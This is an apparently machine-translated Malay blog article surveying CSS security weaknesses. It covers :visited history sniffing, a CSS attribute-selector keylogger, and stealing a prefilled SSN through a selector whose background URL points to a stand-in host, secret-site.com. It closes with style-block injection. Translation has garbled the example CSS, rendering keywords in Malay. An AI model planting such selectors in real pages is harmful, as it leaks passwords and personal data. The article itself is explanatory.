Kelemahan keselamatan CSS

Jangan panik! CSS sendiri bukan risiko keselamatan utama, dan dalam kebanyakan kes tidak perlu terlalu risau.

Walau bagaimanapun, beberapa artikel akan membincangkan ciri -ciri CSS yang berpotensi mengejutkan dan juga membimbangkan. Mari kita meringkaskan:

Isu pautan yang telah dikunjungi

Masalahnya digambarkan seperti berikut:

1. Terdapat pautan di laman web ke halaman tertentu, seperti Tickle Pigs .
2. Anda menggunakan :visited untuk menetapkan warna pautan yang dikunjungi, seperti a:visited { color: pink; } , yang bukan gaya ejen pengguna lalai.
3. Anda menguji gaya pengiraan pautan.
4. Jika warna berwarna merah jambu, ini bermakna pengguna telah melawat halaman tersebut.
5. Anda melaporkan maklumat ini kepada pelayan dan melakukan tindakan tertentu dengan sewajarnya (seperti meningkatkan kadar premium insurans).

Anda mungkin melakukan ini dengan CSS sepenuhnya, kerana gaya :visited mungkin mengandungi background-image: url(/data-logger/tickle.php); , yang hanya akan diminta oleh pengguna yang telah melawat halaman tersebut.

Jangan risau! Pelayar telah menyekat serangan ini.

Keylogger

Masalahnya digambarkan seperti berikut:

1. Terdapat kotak input pada halaman, mungkin kotak input kata laluan.
2. Anda mengambil skrip rekod sebagai imej latar belakang kotak input dan menambah sebilangan besar pemilih untuk mengumpul maklumat kata laluan.

 input [nilai^= "a"] {latar belakang: url (logger.php? v = a); }

Ini tidak mudah dicapai. Atribut value kotak input tidak akan berubah dengan segera kerana input pengguna. Tetapi dalam kerangka seperti React, ini kadang -kadang berlaku. Oleh itu, secara teori, keylogger CSS ini mungkin berfungsi jika anda menambah CSS ini ke halaman log masuk yang dibina dengan React.

Walau bagaimanapun, dalam kes ini, kod JavaScript telah dilaksanakan pada halaman. Untuk serangan sedemikian, JavaScript jauh lebih berbahaya daripada CSS. Keylogger JavaScript memantau peristiwa utama dan melaporkannya melalui Ajax dengan hanya beberapa baris kod.

Dasar Keselamatan Kandungan (CSP) boleh menyekat JavaScript dalam talian yang disuntik oleh pihak ketiga dan XSS ... dan tentu saja, ia juga boleh menyekat CSS.

Kecurian data

Masalahnya digambarkan seperti berikut:

1. Sekiranya saya dapat menambah CSS yang berniat jahat ke halaman laman web yang anda log masuk ...
2. Dan laman web memaparkan maklumat sensitif, seperti Nombor Keselamatan Sosial (SSN), pra-penuh dalam bentuk ...
3. Saya boleh mendapatkannya dengan pemilih harta.

 input#ssn [value = "123-45-6789"] {latar belakang: url (https://secret-site.com/logger.php?ssn=123-45-6789); }

Dengan sebilangan besar pemilih, anda boleh menampung semua kemungkinan!

Masalah Blok Gaya Baris

Saya tidak pasti jika ini harus dipersalahkan di CSS, tetapi bayangkan:

 ... masukkan beberapa kandungan yang dihasilkan pengguna ...

Mungkin anda membenarkan pengguna menyesuaikan beberapa CSS. Ini adalah vektor serangan kerana mereka boleh menutup tag gaya, tag skrip terbuka, dan menulis kod JavaScript yang berniat jahat.

Pasti ada lagi

Adakah anda memikirkannya? Kongsi.

Saya ragu -ragu mengenai tahap ketakutan terhadap kelemahan keselamatan CSS. Saya tidak mahu mengatasi masalah keselamatan (terutamanya isu pihak ketiga) kerana saya bukan pakar dan keselamatan adalah penting. Tetapi pada masa yang sama, saya tidak pernah mendengar tentang CSS menjadi vektor serangan selain daripada eksperimen pemikiran. Tolong ajar saya!

Atas ialah kandungan terperinci Kelemahan keselamatan CSS. Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!